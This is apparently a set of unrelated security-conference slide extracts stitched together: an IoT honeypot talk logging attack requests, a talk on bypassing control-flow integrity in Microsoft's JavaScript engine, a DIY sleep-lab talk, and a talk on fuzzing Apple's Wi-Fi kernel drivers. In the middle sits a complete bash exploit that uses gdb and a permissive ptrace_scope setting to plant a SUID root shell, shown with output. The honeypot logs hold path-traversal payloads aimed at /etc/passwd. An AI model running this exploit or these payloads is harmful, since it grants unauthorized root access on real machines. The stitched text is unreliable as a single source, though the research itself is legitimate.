13. FastHTTPAuthScanner200test From Wuhan, Hubei Province, China
57
Attacks – Script Kiddies (1)
vtigercrm attack (target: Vtiger)
• Mar 12, 2015 15:06:32.614481000
CST
217.160.180.27 51048 HTTP/1.1
GET
/vtigercrm/test/upload/vtiger
crm.txt
• Mar 12, 2015 19:28:40.635673000
CST
177.69.137.97 36571 HTTP/1.1
GET
//vtigercrm/matrix.php?act=f
&f=sip_additional.conf&d=%2Fetc%2Fasterisk
58
Attacks – Script Kiddies (2)
Finding Proxy (mostly from China)
• Mar 12, 2015 17:25:11.681911000
CST
222.186.128.52 3125
HTTP/1.1
GET
http://www.baidu.com/
• Mar 13, 2015 00:00:01.669619000
CST
61.157.96.80
43134 HTTP/1.1
GET
http://www.so.com/?rands=_6
8203491282038869815136
59
Attacks – Script Kiddies (3)
Linksys Router Vulnerability
For E Series Router
• Mar 13, 2015 08:59:41.790785000
CST
149.129.49.120 35675 HTTP/1.1
GET
/tmUnblock.cgi
For older Linksys
• Mar 18, 2015 23:02:11.820423000
CST
114.216.84.142 1998
HTTP/1.1
GET
/HNAP1/
• Mar 19, 2015 00:43:37.161583000
CST
62.24.91.163
49246 HTTP/1.1
GET
/HNAP1/
60
Attacks – Script Kiddies (4)
Tomcat manager exploit (CVE-2009-3843)
• Mar 14, 2015 12:28:48.344370000
CST
119.167.227.55 4308
HTTP/1.1
GET
/manager/html
• Mar 21, 2015 05:57:23.279693000
CST
61.160.211.56 2948
HTTP/1.1
GET
/manager/html
61
Attacks – Script Kiddies (5)
Morpheus Scans
• Mar 15, 2015 04:08:36.934818000
CST
118.98.104.21 59420 HTTP/1.1
GET
/user/soapCaller.bs
62
Attacks – Script Kiddies (6)
Apache Struts (?)
• Mar 22, 2015 19:10:24.120794000 CST
115.230.127.188
3657
HTTP/1.1
POST
/login.action
63
Attacks – Script Kiddies (7)
Shellshock (?)
• Mar 22, 2015 21:45:15.510522000
CST
218.91.204.30 1466
HTTP/1.1
POST
/cgi-bin/wlogin.cgi
64
Attacks – Script Kiddies (8)
OpenCart
• Mar 27, 2015 00:32:11.438060000 CST
209.236.125.108
38783 HTTP/1.1
GET
/admin/config.php
65
Attacks – Script Kiddies (9)
PHPMyAdmin
• Mar 29, 2015 11:08:15.980407000
CST
115.193.234.32 64256 HTTP/1.1
GET
/pma/scripts/setup.php
66
Attacks – Script Kiddies (10)
Interesting Romanian Anti-sec
• Mar 18, 2015 01:35:15.161683000
CST
188.214.58.140 42259 HTTP/1.1
GET
/w00tw00t.at.blackhats.roma
nian.anti-sec:)
• Mar 18, 2015 01:35:16.030473000
CST
188.214.58.140 42324 HTTP/1.1
GET
/phpMyAdmin/scripts/setup.
php
• Mar 18, 2015 01:35:16.751057000
CST
188.214.58.140 42381 HTTP/1.1
GET
/phpmyadmin/scripts/setup.p
hp
• Mar 18, 2015 01:35:17.617702000
CST
188.214.58.140 42433 HTTP/1.1
GET
/pma/scripts/setup.php
• Mar 18, 2015 01:35:18.325491000
CST
188.214.58.140 42495 HTTP/1.1
GET
/myadmin/scripts/setup.php
• Mar 18, 2015 01:35:19.152408000
CST
188.214.58.140 42546 HTTP/1.1
GET
/MyAdmin/scripts/setup.php
67
Attacks – Script Kiddies (11)
Muieblackcat
• Mar 27, 2015 07:03:33.244268000
CST
69.197.148.87 44151 HTTP/1.1
GET
/muieblackcat
• Mar 27, 2015 07:03:33.595012000
CST
69.197.148.87 44311 HTTP/1.1
GET
//phpMyAdmin/scripts/setup.
php
• Mar 27, 2015 07:03:33.948931000
CST
69.197.148.87 44477 HTTP/1.1
GET
//phpmyadmin/scripts/setup.
php
• Mar 27, 2015 07:03:34.308116000
CST
69.197.148.87 44646 HTTP/1.1
GET
//pma/scripts/setup.php
• Mar 27, 2015 07:03:34.709562000
CST
69.197.148.87 44812 HTTP/1.1
GET
//myadmin/scripts/setup.php
• Mar 27, 2015 07:03:35.072852000
CST
69.197.148.87 44994 HTTP/1.1
GET
//MyAdmin/scripts/setup.php
68
Attacks – Script Kiddies (12)
Redhat Jboss
• Apr 2, 2015 20:15:17.478626000
CST
23.21.156.5
48188 HTTP/1.0
GET
/jmx-console/
69
Attacks – Script Kiddies (13-1)
FastHTTPAuthScanner200test From Wuhan, China
• Apr 5, 2015 20:38:54.958254000
CST
121.60.104.246 36360 HTTP/1.1
GET
/operator/basic.shtml AXIS
Video Server and IP Cam
• Apr 5, 2015 20:38:55.066767000
CST
121.60.104.246 36364 HTTP/1.1
GET
/setup
• Apr 5, 2015 20:38:55.181412000
CST
121.60.104.246 36369 HTTP/1.1
GET
/secure/ltx_conf.htm Lantroni
x Xport
• Apr 5, 2015 20:38:55.300158000
CST
121.60.104.246 36372 HTTP/1.1
GET
/syslog.htm
• Apr 5, 2015 20:38:55.422017000
CST
121.60.104.246 36374 HTTP/1.1
GET
/cgi-
bin/webif/info.sh OpenWRT?
• Apr 5, 2015 20:38:55.530658000
CST
121.60.104.246 36379 HTTP/1.1
GET
/control/index_ctrl.html
• Apr 5, 2015 20:38:55.634389000
CST
121.60.104.246 36384 HTTP/1.1
GET
/cgi-bin/camera
70
Attacks – Script Kiddies (13-2)
FastHTTPAuthScanner200test From Wuhan, China
• Apr 5, 2015 20:38:55.948539000
CST
121.60.104.246 36395 HTTP/1.1
GET
http://www.fbi.gov/
• Apr 5, 2015 20:38:56.059004000
CST
121.60.104.246 36398 HTTP/1.0
CONNECT www.fbi.gov:80
• Apr 5, 2015 20:38:56.165412000
CST
121.60.104.246 36401 HTTP/1.1
GET
/FastHTTPAuthScanner200tes
t/
• Apr 5, 2015 20:38:57.882063000
CST
121.60.104.246 36470 HTTP/1.1
GET
/%c0%ae%c0%ae/%c0%ae%c
0%ae/%c0%ae%c0%ae/etc/passwd
• Apr 5, 2015 20:38:58.003634000
CST
121.60.104.246 36475 HTTP/1.1
GET
/%c0%ae%c0%ae/%c0%ae%c
0%ae/%c0%ae%c0%ae/boot.ini
• Apr 5, 2015 20:38:58.118258000
CST
121.60.104.246 36478 HTTP/1.1
GET
/../../../../../../../../etc/passwd
• Apr 5, 2015 20:38:58.355473000
CST
121.60.104.246 36488 HTTP/1.1
GET
/portal/page/portal/TOPLEVE
LSITE/W l
O
l P
t l
71
Moloch
72
Green: src
Red: dst
Easy to identify frequent destinations (and ignore them to find anomalies)
Tshark still helps
/Ringing.at.your.doorbell!
73
Recap
• Mostly script kiddies
– OK, only 1 peeping. Thanks him/her.
• No serious IoT hackers
– Scripts for popular IPCam, yes.
– Targeted on low hanging fruits.
• Very hard to meet those who want to play
74
Backed by Real Devices?
• Pros
– Shodan thinks it’s not a honeypot
– Correct response, correct action
– Hackers know how to identify a CONPOT
• Cons
– Scalability
• Future works
– Route many IP to one lab
– Rewrite at layer 7 to change serial number, footprints
75
Questions?
76
Philips Hue Port 30000 Takeover
Telnet to port 30000 of the bridge and type:
[Link,Touchlink]
The light should blink a few times to acknowledge the hostile
takeover.
Ref:
https://nohats.ca/wordpress/blog/2013/05/26/philips-hue-
alternative-for-lamp-stealer/
77
WD Twonky pings iRadio
78
WDCloud Samsung IPCam
79 | pdf |
THE$ACHILLES'$HEEL$OF$CFI
关于 CFI
0 1
CFI 是什么
2005年微软研究院联合学术界提出的一项漏洞利用缓解技术
用于防御利用内存破坏漏洞来获得软件行为控制权的外部攻击
确保程序执行时的控制流转移符合事先确定的控制流图
关于 CFI
0 2
CFI 的实现
Clang CFI
Microsoft Control Flow Guard
Intel Control-Flow Enforcement Technology
Microsoft eXtended Flow Guard
Clang CFI
0 3
Clang CFI 如何工作
-fsanitize=cfi-cast-strict: Enables strict cast checks.
-fsanitize=cfi-derived-cast: Base-to-derived cast to the wrong dynamic type.
-fsanitize=cfi-unrelated-cast: Cast from void* or another unrelated type to the wrong dynamic type.
-fsanitize=cfi-nvcall: Non-virtual call via an object whose vptr is of the wrong dynamic type.
-fsanitize=cfi-vcall: Virtual call via an object whose vptr is of the wrong dynamic type.
-fsanitize=cfi-icall: Indirect call of a function with wrong dynamic type.
-fsanitize=cfi-mfcall: Indirect call via a member function pointer with wrong dynamic type
Clang CFI
0 4
Clang CFI 如何工作
Clang CFI
0 5
Clang CFI 如何工作
Clang CFI
0 6
Clang CFI 的问题
适用的场合受限
缺少对 Backward-Edge 的保护
Microsoft Control Flow Guard
0 7
CFG 如何工作
Microsoft Control Flow Guard
0 8
CFG 的问题
CFG 是一个粗粒度的 CFI 实现
已知多种针对 CFG 的绕过技术
缺少对 Backward-Edge 的保护
Intel Control-Flow Enforcement Technology
0 9
CET 如何工作
Intel Control-Flow Enforcement Technology
1 0
CET 的问题
依赖特定的硬件
IBT 也是一个粗粒度的 CFI 实现
多数针对 CFG 的绕过技术也适用于 IBT
Microsoft eXtended Flow Guard
1 1
XFG 如何工作
Microsoft eXtended Flow Guard
1 2
XFG 如何工作
Microsoft eXtended Flow Guard
1 3
如何绕过 XFG?
控制流图中 fan-in fan-out 的数量会显著影响 CFI 的有效性
Variable Arguments
Generic Function Object
JavaScript Function
1 4
function f() {
alert("This is a JavaScript Function.");
}
var o = f;
o();
JavaScript Function
1 5
Js::ScriptFunction
ScriptFunction
ScriptFunctionBase
JavascriptFunction
DynamicObject
RecyclableObject
FinalizableObject
IRecyclerVisitedObject
VFT*? vftable;
Type? *? type;
Var*? auxSlots;
ArrayObject *?objectArray;?
ConstructorCache*?constructorCache;
FunctionInfo*?functionInfo;
FrameDisplay*?environment;?
ActivationObjectEx *?cachedScopeObj;
bool?hasInlineCaches;
JavaScript Function
1 6
如何调用
template <class T> void OP_ProfiledCallI(const unaligned OpLayoutDynamicProfile<T>* playout) {
OP_ProfileCallCommon(playout, OP_CallGetFunc(GetRegAllowStackVar(playout->Function)), Js::CallFlags_None, playout->profileId);
}
template <typename RegSlotType> Var InterpreterStackFrame::GetRegAllowStackVar(RegSlotType localRegisterID) const {
Var value = m_localSlots[localRegisterID];
ValidateRegValue(value, true);
return value;
}
RecyclableObject * InterpreterStackFrame::OP_CallGetFunc(Var target) {
return JavascriptOperators::GetCallableObjectOrThrow(target, GetScriptContext());
}
JavaScript Function
1 7
如何调用
template <class T> void InterpreterStackFrame::OP_ProfileCallCommon(const unaligned T * playout, RecyclableObject* function
, unsigned flags, ProfileId profileId, InlineCacheIndex inlineCacheIndex, const Js::AuxArray<uint32> *spreadIndices) {
FunctionBody* functionBody = this->m_functionBody;
DynamicProfileInfo * dynamicProfileInfo= functionBody->GetDynamicProfileInfo();
FunctionInfo* functionInfo = function->GetTypeId() == TypeIds_Function ?
JavascriptFunction::FromVar(function)->GetFunctionInfo() : nullptr;
bool isConstructorCall= (CallFlags_New & flags) == CallFlags_New;
dynamicProfileInfo->RecordCallSiteInfo(functionBody, profileId, functionInfo, functionInfo?
static_cast<JavascriptFunction*>(function) : nullptr, playout->ArgCount, isConstructorCall, inlineCacheIndex);
OP_CallCommon<T>(playout, function, flags, spreadIndices);
if (playout->Return != Js::Constants::NoRegister) {
dynamicProfileInfo->RecordReturnTypeOnCallSiteInfo(functionBody, profileId, GetReg((RegSlot)playout->Return));
}
}
JavaScript Function
1 8
如何调用
void InterpreterStackFrame::OP_CallCommon(const unaligned T * playout, RecyclableObject* function, unsigned flags
, const Js::AuxArray<uint32> *spreadIndices){
...
flags |= CallFlags_NotUsed;
Arguments args(CallInfo((CallFlags)flags, argCount), m_outParams);
AssertMsg(static_cast<unsigned>(args.Info.Flags) == flags, "Flags don't fit into the CallInfo field?");
argCount= args.GetArgCountWithExtraArgs();
if (spreadIndices != nullptr) {
JavascriptFunction::CallSpreadFunction(function, args, spreadIndices);
} else {
JavascriptFunction::CallFunction<true>(function, function->GetEntryPoint(), args);
}
...
}
JavaScript Function
1 9
如何调用
JavaScript Function
2 0
如何调用
JavascriptMethod RecyclableObject::GetEntryPoint() const {
return this->GetType()->GetEntryPoint();
}
inline Type * GetType() const {
return type;
}
JavascriptMethod GetEntryPoint() const {
return entryPoint;
}
ProxyEntryPointInfo*?entryPointInfo;
DynamicTypeHandler *?typeHandler;
bool?isLocked;
bool?isShared;
bool?hasNoEnumerableProperties;
bool?isCachedForChangePrototype;
JavaScript Function
2 1
Js::ScriptFunctionType
ScriptFunctionType
DynamicType
Type
TypeId typeId;
TypeFlagMask flags;
JavascriptLibrary*? javascriptLibrary;
RecyclableObject*? prototype;
JavascriptMethod entryPoint;
TypePropertyCache*? propertyCache;
JavaScript Function
2 2
Js::ScriptFunction
JavaScript Function
2 3
Js::ScriptFunctionType
JavaScript Function
2 4
NativeCodeGenerator::CheckCodeGenThunk
NativeCodeGenerator::CheckCodeGenThunk
JavaScript Function
2 5
Js::ScriptFunctionType
DOM Function
2 6
window.alert("This is a DOM Function.");
DOM Function
2 7
Js::JavascriptExternalFunction
内容
JavascriptExternalFunction
RuntimeFunction
JavascriptFunction
DynamicObject
RecyclableObject
FinalizableObject
IRecyclerVisitedObject
VFT*? vftable;
Type? *? type;
Var*? auxSlots;
ArrayObject *?objectArray;?
ConstructorCache*?constructorCache;
FunctionInfo*?functionInfo;
Var?functionNameId;
UINT64?flags;
Var?signature;
void?*?callbackState;
ExternalMethod nativeMethod;?…
DOM Function
2 8
Js::JavascriptExternalFunction
DOM Function
2 9
Js::Type
DOM Function
3 0
Js::JavascriptExternalFunction::ExternalFunctionThunk
DOM Function
3 1
Js::JavascriptExternalFunction::ExternalFunctionThunk
DOM Getter/Setter Function
3 2
var s = document.createElement("script");
s.async = true;
DOM Getter/Setter Function
3 3
DOM Object
DOM Getter/Setter Function
3 4
Type
DOM Getter/Setter Function
3 5
Prototype
DOM Getter/Setter Function
3 6
Functions
DOM Getter/Setter Function
3 7
Setter Function
如何利用
3 8
DiagnosticsResources
如何利用
3 9
alwaysRefreshFromServer 属性
如何利用
4 0
CFastDOM::CDiagnosticsResources::Profiler_Set_alwaysRefreshFromServer
如何利用
4 1
CFastDOM::CDiagnosticsResources::Trampoline_Set_alwaysRefreshFromServer
如何利用
4 2
CDiagnosticNetworkPatch::SetAlwaysRefreshFromServer
如何利用
4 3
SetRelocPtr
总结
4 4
CFI 是一项有效的漏洞利用缓解措施
目前的 CFI实现都只是某种程度上的近似
完整实现的 CFI 依然不能解决所有问题
M A N O E U V R E
感谢观看!
KCon 汇聚黑客的智慧 | pdf |
#!/usr/bin/env bash
#######################################################
# #
# 'ptrace_scope' misconfiguration #
# Local Privilege Escalation #
# #
#######################################################
# Affected operating systems (TESTED):
# Parrot Home/Workstation 4.6 (Latest Version)
# Parrot Security 4.6 (Latest Version)
# CentOS / RedHat 7.6 (Latest Version)
# Kali Linux 2018.4 (Latest Version)
# Authors: Marcelo Vazquez (s4vitar)
# Victor Lasa (vowkin)
#!"[s4vitar@parrot]"[~/Desktop/Exploit/Privesc]
##""╼ $./exploit.sh
#
#[*] Checking if 'ptrace_scope' is set to 0... [√]
#[*] Checking if 'GDB' is installed... [√]
#[*] System seems vulnerable! [√]
#
0x00 Linux ptrace_scope
0x01
0x02
0x03
0x04 exp
#[*] Starting attack...
#[*] PID -> sh
#[*] Path 824: /home/s4vitar
#[*] PID -> bash
#[*] Path 832: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> bash
#[*] Path 1816: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> bash
#[*] Path 1842: /home/s4vitar
#[*] PID -> bash
#[*] Path 1852: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> bash
#[*] Path 1857: /home/s4vitar/Desktop/Exploit/Privesc
#
#[*] Cleaning up... [√]
#[*] Spawning root shell... [√]
#
#bash-4.4# whoami
#root
#bash-4.4# id
#uid=1000(s4vitar) gid=1000(s4vitar) euid=0(root) egid=0(root) grupos=0(root),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112
(debian-tor),124(bluetooth),136(scanner),1000(s4vitar)
#bash-4.4#
function startAttack(){
while [ ! -f /tmp/bash ]; do
tput civis && pgrep "^(echo $(cat /etc/shells | tr '/' ' ' | awk 'NF{print $NF}' | tr '\n' '|'))$" -u "$(id -u)" | sed '$ d' | while read shell_pid; do
if [ $(cat /proc/$shell_pid/comm 2>/dev/null) ] || [ $(pwdx $shell_pid 2>/dev/null) ]; then
echo "[*] PID -> "$(cat "/proc/$shell_pid/comm" 2>/dev/null)
echo "[*] Path $(pwdx $shell_pid 2>/dev/null)"
fi; echo 'call system("echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1")' | gdb -q -n -p "$shell_pid" >/dev/null 2>&1
done
if [ -f /tmp/bash ]; then
/tmp/bash -p -c 'echo -ne "\n[*] Cleaning up..."
rm /tmp/bash
echo -e " [√]"
echo -ne "[*] Spawning root shell..."
echo -e " [√]\n"
tput cnorm && bash -p'
else
echo -e "\n[*] Could not copy SUID to /tmp/bash [✗]"
fi
sleep 5s
echo "loop"
done
}
echo -ne "[*] Checking if 'ptrace_scope' is set to 0..."
if grep -q "0" < /proc/sys/kernel/yama/ptrace_scope; then
echo " [√]"
echo -ne "[*] Checking if 'GDB' is installed..."
if command -v gdb >/dev/null 2>&1; then
echo -e " [√]"
echo -e "[*] System seems vulnerable! [√]\n"
echo -e "[*] Starting attack..."
startAttack
else
echo " [✗]"
echo "[*] System is NOT vulnerable :( [✗]"
fi
else
echo " [✗]"
echo "[*] System is NOT vulnerable :( [✗]"
fi; tput cnorm
0x05 | pdf |
How to Build Your Very Own Sleep Lab:
The Execution
Presented by:
Keith Biddulph & Ne0nRa1n
Overview
What does it do?
We're collecting data for later interpretation:
Electroencephalogram (EEG)
Heart rate monitor (HRM)
Electronic Ocular Monitor (EOM)
Infrared pictures
Overview
What does it not do?
Breathing measurements
Skin response on face
Why not?
Restless leg and apnea are obvious to an outside
observer
Overview
A series of devices connected to an ordinary
desktop PC:
ModularEEG implementation of the
OpenEEG project
Interfaces with a desktop PC via RS 232 serial port
Homebrew microcontroller (Atmel Atmega128)
device to collect other signals
Also Interfaces with a desktop PC via serial port
USB Webcam modded to see only IR
Hardware overview
OpenEEG overview
Microcontroller data collection device
Sensor choice
ModularEEG from OpenEEG project
Cheap ($<200 to build)
Well tested (Initial release in 2003)
Prebuilt PCBs available
Open Source
Needed to detect stage of sleep
Sensor choice
Wireless heartrate monitor by Oregon Scientific
Super cheap off of eBay ($<20)
Signal to find was relatively simple
Needed to verify that monitored user is calm
Sensor choice
EOM – Fairchild QRB1134
Very cheap
Well documented
Simple
Used to verify REM
Construction pitfalls
ModularEEG – Buy it preassembled!
Took hours of cramped soldering
Easy to make solder bridges or short to ground plane
Easy to put ICs in backwards
Does not include a power supply
Construction highlights
On the fly construction:
Op-amp for HRM to boost signal from 1Vpp to
5vpp
Adding first-order filters to remove noise from
incoming circuits
Finding new and interesting uses for soldering
irons
Initial Data
We plugged theEEG in and nothing caught on
fire!
EEG capture when subject
was asked about their
favourite topic
Initial Data
HRM and EOM verified to be working:
Initial Data
Disclaimer:
We are not doctors, nor do we pretend to be
It is rare, but possible to give yourself an electric
shock with this equipment
There is no warranty – explicit or implied
We are not responsible for the consequences of
anyone attempting to duplicate our efforts
Initial Data
FIXME: show picture clips of various sleep
stages collected here
Analysis
What does this data tell me?
EEG and EOM can verify that user is entering all
stages of sleep.
Analysis
What does this data tell me? (cont.)
Camera stills will show fitful sleep, sleepwalking,
and restless leg.
Elevated heart rate can indicate stress
Additional info
Flowchart of capture software:
Additional info
Future expansion:
More sensors:
Muscle sensors on face
Volume and temperature of airflow to/from lungs
Automagic identification and categorization of
data
Closing
Shoutouts to:
ab3nd, dead addict, lockedindream, lyn, mb,
nobodyhere, old grover, psychedelicbike,
tottenkoph,
Detailed schematics and source code are
available at:
http://defcon17sleeplab.googlepages.com/ | pdf |
#BHUSA @BlackHatEvents
Dive into
Apple IO80211Family
Vol. II
wang yu
#BHUSA @BlackHatEvents
Information Classification: General
About me
[email protected]
Co-founder & CEO at Cyberserval
https://www.cyberserval.com/
Background of this research project
Dive into Apple IO80211FamilyV2
https://www.blackhat.com/us-20/briefings/schedule/index.html#dive-into-apple-iofamilyv-20023
#BHUSA @BlackHatEvents
Information Classification: General
The Apple 80211 Wi-Fi Subsystem
#BHUSA @BlackHatEvents
Information Classification: General
Previously on IO80211Family
Starting from iOS 13 and macOS 10.15 Catalina, Apple refactored the
architecture of the 80211 Wi-Fi client drivers and renamed the new generation
design to IO80211FamilyV2.
From basic network communication to trusted privacy sharing between all types
of Apple devices.
#BHUSA @BlackHatEvents
Information Classification: General
Previously on IO80211Family (cont)
Daemon:
airportd, sharingd ...
Framework:
Apple80211, CoreWifi, CoreWLAN ...
-----------------------------
Family drivers V2:
IO80211FamilyV2, IONetworkingFamily
Family drivers:
IO80211Family, IONetworkingFamily
Plugin drivers V2:
AppleBCMWLANCore replaces AirPort Brcm series drivers
Plugin drivers:
AirPortBrcmNIC, AirPortBrcm4360 / 4331, AirPortAtheros40 ...
Low-level drivers V2:
AppleBCMWLANBusInterfacePCIe …
Low-level drivers:
IOPCIFamily …
#BHUSA @BlackHatEvents
Information Classification: General
Previously on IO80211Family (cont)
An early generation fuzzing framework, a simple code coverage analysis tool, and
a Kemon-based KASAN solution.
Vulnerability classification:
1. Vulnerabilities affecting only IO80211FamilyV2
1.1. Introduced when porting existing V1 features
1.2. Introduced when implementing new V2 features
2. Vulnerabilities affecting both IO80211Family (V1) and IO80211FamilyV2
3. Vulnerabilities affecting only IO80211Family (V1)
#BHUSA @BlackHatEvents
Information Classification: General
Previously on IO80211Family (cont)
Some of the vulnerabilities I've introduced in detail, but others I can't disclose
because they haven't been fixed before Black Hat USA 2020.
Family drivers V2:
IO80211FamilyV2, IONetworkingFamily
CVE-2020-9832
Plugin drivers V2:
AppleBCMWLANCore replaces AirPort Brcm series drivers
CVE-2020-9834, CVE-2020-9899, CVE-2020-10013
Low-level drivers V2:
AppleBCMWLANBusInterfacePCIe …
CVE-2020-9833
#BHUSA @BlackHatEvents
Information Classification: General
Two years have passed
All the previous vulnerabilities have been fixed, the overall security of the system has
been improved. The macOS Big Sur/Monterey/Ventura has been released, and the
era of Apple Silicon has arrived.
1. Apple IO80211FamilyV2 has been refactored again, and its name has been
changed back to IO80211Family. What happened behind this?
2. How to identify the new attack surfaces of the 80211 Wi-Fi subsystem?
3. What else can be improved in engineering and hunting?
4. Most importantly, can we still find new high-quality kernel vulnerabilities?
#BHUSA @BlackHatEvents
Information Classification: General
Never stop exploring
1. Change is the only constant.
2. There are always new attack surfaces, and we need to constantly accumulate
domain knowledge.
3. Too many areas can be improved.
4. Yes, definitely.
#BHUSA @BlackHatEvents
Information Classification: General
Dive into Apple IO80211Family (Again)
#BHUSA @BlackHatEvents
Information Classification: General
Attack surface identification
I'd like to change various settings of the network while sending and receiving data.
- Traditional BSD ioctl, IOKit IOConnectCallMethod series and sysctl interfaces
- Various packet sending and receiving interfaces
- Various network setting interfaces
- Various types of network interfaces
Please Make A Dentist Appointment ASAP: Attacking IOBluetoothFamily HCI and
Vendor-Specific Commands
https://www.blackhat.com/eu-20/briefings/schedule/#please-make-a-dentist-appointment-asap-attacking-
iobluetoothfamily-hci-and-vendor-specific-commands-21155
#BHUSA @BlackHatEvents
Information Classification: General
ifioctl()
https://github.com/apple/darwin-xnu/blob/xnu-7195.121.3/bsd/net/if.c#L2854
ifioctl_nexus()
https://github.com/apple-oss-distributions/xnu/blob/main/bsd/net/if.c#L3288
skoid_create() and sysctl registration
https://github.com/apple-oss-distributions/xnu/blob/main/bsd/skywalk/core/skywalk_sysctl.c#L81
Some new cases
#BHUSA @BlackHatEvents
Information Classification: General
Interfaces integration
I'd like to switch the state or working mode of the kernel state machine randomly for
different network interfaces.
#BHUSA @BlackHatEvents
Information Classification: General
ifconfig command
ap1: Access Point
awdl0: Apple Wireless Direct Link
llw0: Low-latency WLAN Interface. (Used by the Skywalk system)
utun0:Tunneling Interface
lo0: Loopback (Localhost)
gif0: Software Network Interface
stf0: 6to4 Tunnel Interface
en0: Physical Wireless
enX: Thunderbolt / iBridge / Apple T2 Controller
Bluetooth PAN / VM Network Interface
bridge0: Thunderbolt Bridge
#BHUSA @BlackHatEvents
Information Classification: General
Domain knowledge accumulation
Read the XNU source code and documents.
Look for potential attack surface from XNU test cases:
https://github.com/apple/darwin-xnu/tree/xnu-7195.121.3/tests
#BHUSA @BlackHatEvents
Information Classification: General
Some examples
net agent:
https://github.com/apple/darwin-xnu/blob/xnu-7195.121.3/tests/netagent_race_infodisc_56244905.c
https://github.com/apple/darwin-xnu/blob/xnu-7195.121.3/tests/netagent_kctl_header_infodisc_56190773.c
net bridge:
https://github.com/apple/darwin-xnu/blob/xnu-7195.121.3/tests/net_bridge.c
net utun:
https://github.com/apple/darwin-xnu/blob/xnu-7195.121.3/tests/net_tun_pr_35136664.c
IP6_EXTHDR_CHECK:
https://github.com/apple/darwin-xnu/blob/xnu-7195.121.3/tests/IP6_EXTHDR_CHECK_61873584.c
#BHUSA @BlackHatEvents
Information Classification: General
Random, but not too random
So far, the new generation of Apple 80211 Wi-Fi fuzzing framework integrates
more than forty network interfaces and attack surfaces.
One more thing. Is the more attack surfaces covered in each test the better?
In practice, I found that this is not the case.
#BHUSA @BlackHatEvents
Information Classification: General
Conclusion one
- About network interfaces and attack surfaces
1. We need to accumulate as much domain knowledge as possible by learning
XNU source code, documents and test cases.
2. For each round, we should randomly select two or three interface units and test
them as fully as possible.
#BHUSA @BlackHatEvents
Information Classification: General
Kernel debugging
From source code learning, static analysis to remote kernel debugging.
Make full use of LLDB and KDK:
- The information provided in the panic log is often not helpful in finding the
root cause
- Variable (initial) value sometimes require dynamic analysis
- Kernel heap corruption requires remote debugging
#BHUSA @BlackHatEvents
Information Classification: General
A kernel panic case
Without the help of the kernel debugger, there is probably no answer.
#BHUSA @BlackHatEvents
Information Classification: General
#BHUSA @BlackHatEvents
Information Classification: General
Kernel Debug Kit
"Note: Apple silicon doesn’t support active kernel debugging. … you cannot set
breakpoints, continue code execution, step into code, step over code, or step out
of the current instruction."
Asahi Linux
https://asahilinux.org/
An Overview of macOS Kernel Debugging
https://blog.quarkslab.com/an-overview-of-macos-kernel-debugging.html
LLDBagility: Practical macOS Kernel Debugging
https://blog.quarkslab.com/lldbagility-practical-macos-kernel-debugging.html
#BHUSA @BlackHatEvents
Information Classification: General
Conclusion two
- About network interfaces and attack surfaces
- About static and dynamic analysis methods
1. We should make full use of LLDB kernel debugging environment, KDK and public
symbols for reverse engineering.
2. At this stage, we need the help of third-party solutions for the Apple Silicon platform.
#BHUSA @BlackHatEvents
Information Classification: General
Kernel Address Sanitizer
The previous panic is a typical case of corruption, and we need help from KASAN.
However, we need to do some fixes because sometimes the built-in tools/kernels
don't work very well.
We even need to implement KASAN-like solution to dynamically monitor special
features of third-party kernel extensions.
#BHUSA @BlackHatEvents
Information Classification: General
console_io_allowed()
https://github.com/apple/darwin-xnu/blob/xnu-7195.121.3/osfmk/console/serial_console.c#L162
An obstacle case
static inline bool
console_io_allowed(void)
{
if (!allow_printf_from_interrupts_disabled_context &&
!console_suspended &&
startup_phase >= STARTUP_SUB_EARLY_BOOT &&
!ml_get_interrupts_enabled()) {
#if defined(__arm__) || defined(__arm64__) || DEBUG || DEVELOPMENT
panic("Console I/O from interrupt-disabled context");
#else
return false;
#endif
}
return true;
}
#BHUSA @BlackHatEvents
Information Classification: General
#BHUSA @BlackHatEvents
Information Classification: General
KASAN and code coverage analysis
Kemon: An Open Source Pre and Post Callback-based Framework for macOS
Kernel Monitoring
https://github.com/didi/kemon
https://www.blackhat.com/us-18/arsenal/schedule/index.html#kemon-an-open-source-pre-and-post-
callback-based-framework-for-macos-kernel-monitoring-12085
I have ported Kemon and the kernel inline engine to the Apple Silicon platform.
#BHUSA @BlackHatEvents
Information Classification: General
Conclusion three
- About network interfaces and attack surfaces
- About static and dynamic analysis methods
- About creating tools
1. We need to do fixes because sometimes the built-in tools don't work very well.
2. We even need to implement KASAN-like solution, code coverage analysis tool to
dynamically monitor third-party closed source kernel extensions.
#BHUSA @BlackHatEvents
Information Classification: General
Apple SDKs and build-in tools
Apple80211 SDKs (for 10.4 Tiger, 10.5 Leopard and 10.6 Snow Leopard)
https://github.com/phracker/MacOSX-SDKs/releases
Build-in network and Wi-Fi tools
#BHUSA @BlackHatEvents
Information Classification: General
Giving back to the community
#define APPLE80211_IOC_COMPANION_SKYWALK_LINK_STATE 0x162
#define APPLE80211_IOC_NAN_LLW_PARAMS 0x163
#define APPLE80211_IOC_HP2P_CAPS 0x164
#define APPLE80211_IOC_RLLW_STATS 0x165
APPLE80211_IOC_UNKNOWN (NULL/No corresponding handler) 0x166
#define APPLE80211_IOC_HW_ADDR 0x167
#define APPLE80211_IOC_SCAN_CONTROL 0x168
APPLE80211_IOC_UNKNOWN (NULL/No corresponding handler) 0x169
#define APPLE80211_IOC_CHIP_DIAGS 0x16A
#define APPLE80211_IOC_USB_HOST_NOTIFICATION 0x16B
#define APPLE80211_IOC_LOWLATENCY_STATISTICS 0x16C
#define APPLE80211_IOC_DISPLAY_STATE 0x16D
#define APPLE80211_IOC_NAN_OOB_AF_TX 0x16E
#define APPLE80211_IOC_NAN_DATA_PATH_KEEP_ALIVE_IDENTIFIER 0x16F
#define APPLE80211_IOC_SET_MAC_ADDRESS 0x170
#define APPLE80211_IOC_ASSOCIATE_EXTENDED_RESULT 0x171
#define APPLE80211_IOC_AWDL_AIRPLAY_STATISTICS 0x172
#define APPLE80211_IOC_HP2P_CTRL 0x173
#define APPLE80211_IOC_REQUEST_BSS_BLACKLIST 0x174
